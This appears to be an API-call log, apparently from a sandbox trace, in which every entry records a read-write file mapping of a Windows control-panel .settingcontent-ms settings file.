Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupMapsUpdates.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupMapsUpdates.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupNotificationsAppList.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupNotificationsAppList.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDetails.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDetails.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPen.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPen.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupVirtualDesktops.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupVirtualDesktops.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupYourAccount.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupYourAccount.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsManage.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsManage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsPicture.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsPicture.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsSync.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsSync.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsUsers.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsUsers.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageActivate.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageActivate.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaults.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaults.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsNotifications.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsNotifications.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBackground.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBackground.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBatterySaver.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBatterySaver.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageColors.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageColors.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDataSenseOverview.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDataSenseOverview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPen.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPen.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPrinters.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPrinters.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageLockScreen.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageLockScreen.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMaps.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMaps.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMultiTasking.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMultiTasking.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDialup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDialup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkEthernet.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkEthernet.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkProxy.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkProxy.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkVPN.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkVPN.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWiFi.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWiFi.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWorkplace.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageNetworkWorkplace.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDevices.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDevices.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDisplay.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDisplay.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemInfo.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
